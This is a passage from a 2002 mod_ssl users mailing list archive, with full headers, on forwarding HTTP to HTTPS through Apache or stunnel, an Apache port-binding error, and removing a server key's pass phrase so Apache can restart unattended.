>as well. It's capable of doing SSL Bridging, i.e. a full SSL proxy. It could
>also be configured to have an HTTP session to the proxy and a HTTPS session
>to the target platform.
>
>Have a look at http://www.microsoft.com/isaserver and
>http://www.isaserver.org/pages/articles.asp?art=157
>
>hth
>
>Meint
>
>
>
>----- Original Message -----
>From: "Michael Pacey" 
>To: 
>Sent: Wednesday, July 24, 2002 10:29 PM
>Subject: Re: http to https forward
>
>
>> Quoting David Iungerich :
>>
>> > I need to implement Apache as an https to http forwarder.  I belive I
>> > need
>> > to use
>> > ProxyPass or Redirect, but am having difficulty figuring out the
>> > correct
>> > configuration.
>>
>>
>> Just to clarify, I think you mean http to https forwarder, as in your
>subject;
>> Apache forwards https to http without any problems.
>>
>> But for http to https, your problem isn't configuration; Apache+mod_ssl
>doesn't
>> have the code for initiation of HTTPS connections. I've looked!
>>
>> Everybody told me it wouldn't work, I didn't believe them, I couldn't make
>it
>> work, I read the code, it's not there!
>>
>> The only product I know of that might be able to do this is IBM
>EdgeServer, and
>> possibly Netscape. Have to say I don't like EdgeServer and I have no
>experience
>> of Netscape.
>>
>> Is there no-one around who'd like to code this? There are quite a few
>people who
>> want to use Apache to initiate HTTPS connections. I don't have the time /
>coding
>> skills.
>> --
>> Web: http://sydb.dyndns.org
>> ICQ: 152392113 (New to ICQ? http://www.mirabilis.com)
>> IRC: #sydb on EFnet (New to IRC? http://www.irchelp.org)
>> ______________________________________________________________________
>> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>> User Support Mailing List                      modssl-users@modssl.org
>> Automated List Manager                            majordomo@modssl.org
>>
>
>______________________________________________________________________
>Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>User Support Mailing List                      modssl-users@modssl.org
>Automated List Manager                            majordomo@modssl.org
>


__________________________________________________
D O T E A S Y - "Join the web hosting revolution!"
             http://www.doteasy.com
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Jul 26 15:36:22 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id OAA05795; Fri, 26 Jul 2002 14:55:24 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from cobain.rowan.edu id OAA05562; Fri, 26 Jul 2002 14:53:38 +0200 (MET DST)
Received: (from root@localhost)
	by cobain.rowan.edu (8.9.3/8.9.3) id IAA22066
	for modssl-users@modssl.org; Fri, 26 Jul 2002 08:53:23 -0400
Received: from exchange55.rowan.edu (exchange55.rowan.edu [150.250.128.202])
	by cobain.rowan.edu (8.9.3/8.9.3) with ESMTP id IAA22057
	for ; Fri, 26 Jul 2002 08:53:22 -0400
Received: by exchange55.rowan.edu with Internet Mail Service (5.5.2653.19)
	id ; Fri, 26 Jul 2002 08:53:20 -0400
Message-ID: <620C5EE828A4FF4DB21BB411F4C60DCA0E5A57@exchange55.rowan.edu>
From: "Clemente, Michael P." 
To: "'modssl-users@modssl.org'" 
Subject: RE: http to https forward
Date: Fri, 26 Jul 2002 08:53:16 -0400
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2653.19)
Content-Type: text/plain
X-Virus-Scanned: by AMaViS perl-10
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Clemente, Michael P." 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Try looking at documentation for mod-rewrite.  It is part of the mod_ssl
distribution.  Right now we have a few servers that take any off-site http
request rewrite the URL to https.  

http://www.modssl.org/docs/2.8/ssl_faq.html#relative-links

http://httpd.apache.org/docs/mod/mod_rewrite.html

Hope this helps.

Michael Clemente
Network Specialist
Network & System Services
Rowan University


-----Original Message-----
From: David Iungerich [mailto:david@iungerich.com] 
Sent: Wednesday, July 24, 2002 3:07 PM
To: modssl-users@modssl.org
Subject: http to https forward
Importance: High


I need to implement Apache as an https to http forwarder.  I belive I need
to use ProxyPass or Redirect, but am having difficulty figuring out the
correct configuration. My scenario is as follows:

I have an appserver that needs to POST http requests to another company's
appserver.  Unfortunately, the particular product we are using has issues
being able to send https, and the other company requires it.  They have
issued us certificates to talk to them.  I need to be able to send http POST
reqests to an Apache webserver, have it encrypt the request with the other
company's cert, and then pass the POST onto that company's server via https.
No browser involved.  Eventually, I will need to do the same thing in
reverse, but initially I just need to be able to send in this direction. Can
you tell me what all specific entries needed in the conf file to implement
this.  Again, our server http to Apache, then encrypt using cert we were
given, and Apache to other company's server via https.

Apache Vesion is currently 1.3.23 - will update for security issues once we
can implement this scenario. Running on Suse Linux 8.0

Thanks,
David

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Jul 26 18:37:23 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id SAA00348; Fri, 26 Jul 2002 18:20:59 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from uxe450b.kwe.com id SAA29981; Fri, 26 Jul 2002 18:18:19 +0200 (MET DST)
Received: from diungerich ([10.0.2.83]) by uxe450b.kwe.com
          (Netscape Messaging Server 3.6)  with SMTP id AAABF2
          for ; Fri, 26 Jul 2002 15:20:10 +0000
From: "David Iungerich" 
To: 
Subject: RE: http to https forward
Date: Fri, 26 Jul 2002 10:20:57 -0500
Message-ID: 
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2910.0)
In-reply-to: <200207260255.AA85524592@lopette.org>
X-MIMEOLE: Produced By Microsoft MimeOLE V5.50.4807.1700
Importance: Normal
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "David Iungerich" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Arcean,

I'm probably going to continue with my Apache 2.0.39 route, but what all
specifically is involved in the setup of Stunnel to do what I am looking
for?  If it's quicker, I may take that route.

Thanks,
David

-----Original Message-----
From: owner-modssl-users@modssl.org
[mailto:owner-modssl-users@modssl.org]On Behalf Of arcean
Sent: Friday, July 26, 2002 4:56 AM
To: modssl-users@modssl.org
Subject: RE: http to https forward


USE Stunnel it's Really simpe

Ido use it for exactly the same probleme

and i use reciproc - authentification (client&serveur)

good perf on *nix
no so bad on win32 ...

>I have an appserver that needs to POST http requests to another company's
>appserver.  Unfortunately, the particular product we are using has issues
>being able to send https, and the other company requires it.  They have
>issued us certificates to talk to them.  I need to be able to send http
POST
>reqests to an Apache webserver, have it encrypt the request with the other
>company's cert, and then pass the POST onto that company's server via
https.
>No browser involved.  Eventually, I will need to do the same thing in
>reverse, but initially I just need to be able to send in this direction.
>Can you tell me what all specific entries needed in the conf file to
>implement
>this.  Again, our server http to Apache, then encrypt using cert we were
>given, and Apache to other
>company's server via https.
>
>Apache Vesion is currently 1.3.23 - will update for security issues once we
>can implement this scenario.
>Running on Suse Linux 8.0
>
>Thanks,
>David
>
>______________________________________________________________________
>Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>User Support Mailing List                      modssl-users@modssl.org
>Automated List Manager                            majordomo@modssl.org
>


__________________________________________________
D O T E A S Y - "Join the web hosting revolution!"
             http://www.doteasy.com
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Jul 26 18:58:21 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id SAA04391; Fri, 26 Jul 2002 18:51:21 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from battersbox.nameconnector.com id SAA04219; Fri, 26 Jul 2002 18:49:59 +0200 (MET DST)
Received: from MAILBOX.nameconnector.com ([10.1.64.1]) by battersbox.nameconnector.com with Microsoft SMTPSVC(5.0.2195.4905);
	 Fri, 26 Jul 2002 12:48:40 -0400
Received: by MAILBOX.nameconnector.com with Internet Mail Service (5.5.2653.19)
	id <3ZAG98XC>; Fri, 26 Jul 2002 12:48:40 -0400
Message-ID: <61957B071FF421419E567A28A45C7FE514A609@MAILBOX.nameconnector.com>
From: Geoffrey Talvola 
To: "'modssl-users@modssl.org'" ,
        "'david@iungerich.com'" 
Subject: RE: http to https forward
Date: Fri, 26 Jul 2002 12:48:39 -0400
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2653.19)
Content-Type: text/plain;
	charset="iso-8859-1"
X-OriginalArrivalTime: 26 Jul 2002 16:48:40.0570 (UTC) FILETIME=[4B8F1DA0:01C234C4]
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Geoffrey Talvola 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Setting up the forwarding without a certificate is as easy as running:

stunnel -c -r www.paypal.com:443 -d 127.0.0.1:5555

Then you can connect to http://localhost:5555/ and it will forward your
request to www.paypal.com using SSL.

As far as setting up the certificate stuff, I haven't done it, but
http://www.stunnel.org/ seems to have good instructions.

- Geoff

> -----Original Message-----
> From: David Iungerich [mailto:david@iungerich.com]
> Sent: Friday, July 26, 2002 11:21 AM
> To: modssl-users@modssl.org
> Subject: RE: http to https forward
> 
> 
> Arcean,
> 
> I'm probably going to continue with my Apache 2.0.39 route, 
> but what all
> specifically is involved in the setup of Stunnel to do what I 
> am looking
> for?  If it's quicker, I may take that route.
> 
> Thanks,
> David
> 
> -----Original Message-----
> From: owner-modssl-users@modssl.org
> [mailto:owner-modssl-users@modssl.org]On Behalf Of arcean
> Sent: Friday, July 26, 2002 4:56 AM
> To: modssl-users@modssl.org
> Subject: RE: http to https forward
> 
> 
> USE Stunnel it's Really simpe
> 
> Ido use it for exactly the same probleme
> 
> and i use reciproc - authentification (client&serveur)
> 
> good perf on *nix
> no so bad on win32 ...
> 
> >I have an appserver that needs to POST http requests to 
> another company's
> >appserver.  Unfortunately, the particular product we are 
> using has issues
> >being able to send https, and the other company requires it. 
>  They have
> >issued us certificates to talk to them.  I need to be able 
> to send http
> POST
> >reqests to an Apache webserver, have it encrypt the request 
> with the other
> >company's cert, and then pass the POST onto that company's server via
> https.
> >No browser involved.  Eventually, I will need to do the same thing in
> >reverse, but initially I just need to be able to send in 
> this direction.
> >Can you tell me what all specific entries needed in the conf file to
> >implement
> >this.  Again, our server http to Apache, then encrypt using 
> cert we were
> >given, and Apache to other
> >company's server via https.
> >
> >Apache Vesion is currently 1.3.23 - will update for security 
> issues once we
> >can implement this scenario.
> >Running on Suse Linux 8.0
> >
> >Thanks,
> >David
> >
> >_____________________________________________________________
> _________
> >Apache Interface to OpenSSL (mod_ssl)                   
www.modssl.org
>User Support Mailing List                      modssl-users@modssl.org
>Automated List Manager                            majordomo@modssl.org
>


__________________________________________________
D O T E A S Y - "Join the web hosting revolution!"
             http://www.doteasy.com
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sat Jul 27 13:07:25 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id NAA17595; Sat, 27 Jul 2002 13:05:40 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id NAA17528; Sat, 27 Jul 2002 13:05:00 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id CC2BB4CE729; Sat, 27 Jul 2002 09:48:15 +0200 (CEST)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id 3B4EC285C8; Sat, 27 Jul 2002 09:13:26 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from smtpout.mac.com id AAA08726; Sat, 27 Jul 2002 00:53:12 +0200 (MET DST)
Received: from smtp-relay02.mac.com (smtp-relay02-en1 [10.13.10.225])
	by smtpout.mac.com (8.12.1/8.10.2/1.0) with ESMTP id g6QMFB9p017106
	for ; Fri, 26 Jul 2002 15:15:16 -0700 (PDT)
Received: from asmtp01.mac.com (asmtp01-qfe3 [10.13.10.65])
	by smtp-relay02.mac.com (8.12.1/8.12.1/1.0) with ESMTP id g6QMFBZH017579
	for ; Fri, 26 Jul 2002 15:15:11 -0700 (PDT)
Received: from localhost ([142.177.168.89]) by asmtp01.mac.com
          (Netscape Messaging Server 4.15) with ESMTP id GZVN5A00.KAR for
          ; Fri, 26 Jul 2002 15:15:10 -0700 
Date: Fri, 26 Jul 2002 19:15:29 -0300
Mime-Version: 1.0 (Apple Message framework v482)
Content-Type: text/plain; charset=US-ASCII; format=flowed
Subject: Virtual Hosting Problem
From: Jay States 
To: modssl-users@modssl.org
Content-Transfer-Encoding: 7bit
Message-Id: <31AA9A68-A0E5-11D6-96F8-0003935770DE@mac.com>
X-Mailer: Apple Mail (2.482)
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Jay States 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users


I have tried to configure a port-based virtual hosts with the following 
ports:

443
444
445
446
447

Is there a better how-to than on the apache site?  I'm using apache 
2.0.39 and would like to see an example.  I follow the text and keep 
getting the same error message.  Keep in mind that port is not used by 
anything other than apache.

(48)Address already in use: make_sock: could not bind to address [::]:447
no listening sockets available, shutting down

Thanks in advance.

J
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sat Jul 27 13:07:35 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id NAA17650; Sat, 27 Jul 2002 13:06:11 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id NAA17524; Sat, 27 Jul 2002 13:05:00 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id D9F794CE73E; Sat, 27 Jul 2002 09:48:15 +0200 (CEST)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id E8076285C8; Sat, 27 Jul 2002 09:47:54 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from dave.w5sv.org id HAA17091; Sat, 27 Jul 2002 07:55:47 +0200 (MET DST)
Received: from w5sv.org (dave.W5SV.org [192.168.131.121])
	by dave.w5sv.org (8.11.6/8.11.6) with ESMTP id g6R3vUC12713;
	Fri, 26 Jul 2002 22:57:31 -0500
Message-ID: <3D421A2A.4060005@w5sv.org>
Date: Fri, 26 Jul 2002 22:57:30 -0500
From: "David F. Reed" 
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:0.9.4.1) Gecko/20020508 Netscape6/6.2.3
X-Accept-Language: en, ja, es
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Possibility of no keying phrase keys?
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "David F. Reed" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Dear SSL experts and aficionados and RH gurus,

I am hoping someone out there has a piece of arcane (to me)
knowledge...

(Running RH-7.3,  apache-1.3.23-14, openssl-0.9.6b-18)

I note that during reboot (a rare event), some one trusted
has to be around to manually key in the pass phrase to the
server.key file - sometimes it waits for this, and sometimes not;
in either case, unattended, the httpd sits around waiting to start.

(I learned this the other day when a power outage convinced
my system to shut down, and it restarted when power resumed).

So my question is, is there a way to generate a key that does not
look for a pass phrase, or automagically pipe the contents of some
file, or some such work around, so that unattended, it can
come up and function as a server?

Any discussion of experience would be helpful

Many thanks.

--Dave

David F. Reed  -> email: W5SV@arrl.net
(for pgp key: davereed@W5SV.org http://keys.pgp.com/ )
 

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sat Jul 27 13:28:14 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id NAA20498; Sat, 27 Jul 2002 13:27:46 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from mhub.AXP.MDX.AC.UK id NAA20350; Sat, 27 Jul 2002 13:26:42 +0200 (MET DST)
Received: from CONVERSION-DAEMON.mdx.ac.uk by mdx.ac.uk (PMDF V6.1-1 #38636)
 id <01KKK52ZQJ28000RVU@mdx.ac.uk> for modssl-users@modssl.org; Fri,
 26 Jul 2002 17:43:19 +0100 (BST)
Received: from mdx-bg-staff1.nw.mdx.ac.uk
 (mdx-bg-staff1.mdx.ac.uk [158.94.39.4]) by mdx.ac.uk (PMDF V6.1-1 #38636)
 with ESMTP id <01KKK52Y9W3G000VIH@mdx.ac.uk> for modssl-users@modssl.org; Fri,
 26 Jul 2002 17:43:17 +0100 (BST)
Received: from MDX-BG-STAFF1/SpoolDir by mdx-bg-staff1.nw.mdx.ac.uk
 (Mercury 1.48); Fri, 26 Jul 2002 17:39:15 +0000
Received: from SpoolDir by MDX-BG-STAFF1 (Mercury 1.48); Fri,
 26 Jul 2002 17:38:50 +0000
Date: Fri, 26 Jul 2002 17:38:22 +0000
From: a.moon@mdx.ac.uk
Subject: RE: http to https forward
To: modssl-users@modssl.org
Message-id: <2FF10CC6D55@mdx-bg-staff1.nw.mdx.ac.uk>
Content-transfer-encoding: 7BIT
X-Autoreply-From: 
X-Comment: Middlesex University has scanned this message for viruses.
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: a.moon@mdx.ac.uk
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

I am away from the office until the Monday 5th August 2002 

I will get back to you as soon as i can on my return.

If it's an urgent Online Learning Support Unit / Web/ MUBSWEB/ MUBS Online matter
that requires urgent attention then  please contact either  Sanjay1 or Jeff1
who should be able to help.

All the best 
Alex
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sat Jul 27 14:36:15 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id OAA00047; Sat, 27 Jul 2002 14:36:10 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from sage-one.net id OAA29814; Sat, 27 Jul 2002 14:34:20 +0200 (MET DST)
Received: from sagea (sagea [192.168.0.3])
	by sage-one.net (8.11.6/8.11.6) with SMTP id g6RCYHB19818;
	Sat, 27 Jul 2002 07:34:17 -0500 (CDT)
	(envelope-from jacks@sage-american.com)
Message-Id: <3.0.5.32.20020727073427.00e1f120@sage-american.com>
X-Sender: jacks@sage-american.com
X-Mailer: QUALCOMM Windows Eudora Pro Version 3.0.5 (32)
Date: Sat, 27 Jul 2002 07:34:27 -0500
To: modssl-users@modssl.org, modssl-users@modssl.org
From: "Jack L. Stone" 
Subject: Re: Possibility of no keying phrase keys?
In-Reply-To: <3D421A2A.4060005@w5sv.org>
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Jack L. Stone" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

At 10:57 PM 7.26.2002 -0500, David F. Reed wrote:
>Dear SSL experts and aficionados and RH gurus,
>
>I am hoping someone out there has a piece of arcane (to me)
>knowledge...
>
>(Running RH-7.3,  apache-1.3.23-14, openssl-0.9.6b-18)
>
>I note that during reboot (a rare event), some one trusted
>has to be around to manually key in the pass phrase to the
>server.key file - sometimes it waits for this, and sometimes not;
>in either case, unattended, the httpd sits around waiting to start.
>
>(I learned this the other day when a power outage convinced
>my system to shut down, and it restarted when power resumed).
>
>So my question is, is there a way to generate a key that does not
>look for a pass phrase, or automagically pipe the contents of some
>file, or some such work around, so that unattended, it can
>come up and function as a server?
>
>Any discussion of experience would be helpful
>
>Many thanks.
>
>--Dave
>

Not sure what OS you have, but I run FBSD and this is the method I use to
solve that:
To decrypt the Key:

First make a copy of the encrypted key

# cp server.key server.key.cryp
 
Then re-write the key with encryption. You will be prompted for the
original encrypted Key passphrase

# /usr/bin/openssl rsa -in server.key.cryp -out server.key
read RSA key
Enter PEM pass phrase:
writing RSA key
 
One way to secure the decrypted Private Key is to make readable only by the
root: 
# chmod 400 server.key

Best regards,
Jack L. Stone,
Administrator

Sage American
http://www.sage-american.com
jacks@sage-american.com
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sat Jul 27 14:47:41 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id OAA01489; Sat, 27 Jul 2002 14:46:14 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from sage-one.net id OAA01329; Sat, 27 Jul 2002 14:45:00 +0200 (MET DST)
Received: from sagea (sagea [192.168.0.3])
	by sage-one.net (8.11.6/8.11.6) with SMTP id g6RCixB19877;
	Sat, 27 Jul 2002 07:44:59 -0500 (CDT)
	(envelope-from jacks@sage-american.com)
Message-Id: <3.0.5.32.20020727074510.00e1f120@sage-american.com>
X-Sender: jacks@sage-american.com
X-Mailer: QUALCOMM Windows Eudora Pro Version 3.0.5 (32)
Date: Sat, 27 Jul 2002 07:45:10 -0500
To: modssl-users@modssl.org, modssl-users@modssl.org
From: "Jack L. Stone" 
Subject: Re: Possibility of no keying phrase keys?
In-Reply-To: <3D421A2A.4060005@w5sv.org>
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Jack L. Stone" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

At 10:57 PM 7.26.2002 -0500, David F. Reed wrote:
>Dear SSL experts and aficionados and RH gurus,
>
>I am hoping someone out there has a piece of arcane (to me)
>knowledge...
>
>(Running RH-7.3,  apache-1.3.23-14, openssl-0.9.6b-18)
>
>I note that during reboot (a rare event), some one trusted
>has to be around to manually key in the pass phrase to the
>server.key file - sometimes it waits for this, and sometimes not;
>in either case, unattended, the httpd sits around waiting to start.
>
>(I learned this the other day when a power outage convinced
>my system to shut down, and it restarted when power resumed).
>
>So my question is, is there a way to generate a key that does not
>look for a pass phrase, or automagically pipe the contents of some
>file, or some such work around, so that unattended, it can
>come up and function as a server?
>
>Any discussion of experience would be helpful
>
>Many thanks.
>
>--Dave
>
....oops! It's still early here and no coffee. I see now that you run
Linux, so the paths will be different...., but perhaps the commands will
work. Not familiar with Linux....

Best regards,
Jack L. Stone,
Administrator

Sage American
http://www.sage-american.com
jacks@sage-american.com
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sat Jul 27 16:46:16 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id QAA16598; Sat, 27 Jul 2002 16:41:05 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from relais.videotron.ca id QAA16447; Sat, 27 Jul 2002 16:39:41 +0200 (MET DST)
Received: from toilet ([24.202.196.150]) by relais.videotron.ca
          (Videotron-Netscape Messaging Server v4.15 MTA-PRD3) with ESMTP
          id GZWWQ302.TTH for ; Sat, 27 Jul 2002
          10:39:39 -0400 
Received: from toilet
	([127.0.0.1] helo=localhost ident=geoff)
	by toilet with esmtp (Exim 3.35 #1 (Debian))
	id 17YSjK-0000DK-00; Sat, 27 Jul 2002 10:39:38 -0400
Date: Sat, 27 Jul 2002 10:39:38 -0400 (EDT)
From: Geoff Thorpe 
X-X-Sender: geoff@toilet.localnet
To: modssl-users@modssl.org
Subject: Re: Possibility of no keying phrase keys?
In-Reply-To: <3D421A2A.4060005@w5sv.org>
Message-ID: 
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Geoff Thorpe 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hi,

On Fri, 26 Jul 2002, David F. Reed wrote:

[snip]

> I note that during reboot (a rare event), some one trusted
> has to be around to manually key in the pass phrase to the
> server.key file - sometimes it waits for this, and sometimes not;
> in either case, unattended, the httpd sits around waiting to start.

http://www.openssl.org/support/faq.html#USER9

Cheers,
Geoff

-- 
Geoff Thorpe
geoff@geoffthorpe.net


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sat Jul 27 21:26:10 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id VAA19346; Sat, 27 Jul 2002 21:25:23 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id VAA19321; Sat, 27 Jul 2002 21:25:00 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id E3EBE4CE68E; Sat, 27 Jul 2002 20:27:09 +0200 (CEST)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id 6EA5F285C7; Sat, 27 Jul 2002 19:55:52 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from dave.w5sv.org id PAA08239; Sat, 27 Jul 2002 15:35:52 +0200 (MET DST)
Received: from w5sv.org (dave.W5SV.org [192.168.131.121])
	by dave.w5sv.org (8.11.6/8.11.6) with ESMTP id g6RDZGC18952;
	Sat, 27 Jul 2002 08:35:16 -0500
Message-ID: <3D42A194.3060101@w5sv.org>
Date: Sat, 27 Jul 2002 08:35:16 -0500
From: "David F. Reed" 
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:0.9.4.1) Gecko/20020508 Netscape6/6.2.3
X-Accept-Language: en, ja, es
MIME-Version: 1.0
To: modssl-users@modssl.org
Cc: jacks@sage-american.com
Subject: Re: Possibility of no keying phrase keys?
References: <3.0.5.32.20020727073427.00e1f120@sage-american.com>
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "David F. Reed" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Many thanks Jack!

worked like a charm.

--Dave

Jack L. Stone wrote:

>At 10:57 PM 7.26.2002 -0500, David F. Reed wrote:
>
>>Dear SSL experts and aficionados and RH gurus,
>>
>>I am hoping someone out there has a piece of arcane (to me)
>>knowledge...
>>
>>(Running RH-7.3,  apache-1.3.23-14, openssl-0.9.6b-18)
>>
>>I note that during reboot (a rare event), some one trusted
>>has to be around to manually key in the pass phrase to the
>>server.key file - sometimes it waits for this, and sometimes not;
>>in either case, unattended, the httpd sits around waiting to start.
>>
>>(I learned this the other day when a power outage convinced
>>my system to shut down, and it restarted when power resumed).
>>
>>So my question is, is there a way to generate a key that does not
>>look for a pass phrase, or automagically pipe the contents of some
>>file, or some such work around, so that unattended, it can
>>come up and function as a server?
>>
>>Any discussion of experience would be helpful
>>
>>Many thanks.
>>
>>--Dave
>>
>
>Not sure what OS you have, but I run FBSD and this is the method I use to
>solve that:
>To decrypt the Key:
>
>First make a copy of the encrypted key
>
># cp server.key server.key.cryp
> 
>Then re-write the key with encryption. You will be prompted for the
>original encrypted Key passphrase
>
># /usr/bin/openssl rsa -in server.key.cryp -out server.key
>read RSA key
>Enter PEM pass phrase:
>writing RSA key
> 
>One way to secure the decrypted Private Key is to make readable only by the
>root: 
># chmod 400 server.key
>
>Best regards,
>Jack L. Stone,
>Administrator
>
>Sage American
>http://www.sage-american.com
>jacks@sage-american.com
>______________________________________________________________________
>Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>User Support Mailing List                      modssl-users@modssl.org
>Automated List Manager                            majordomo@modssl.org
>

-- 
David F. Reed  -> email: W5SV@arrl.net
(for pgp key: davereed@W5SV.org http://keys.pgp.com/ )
 


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
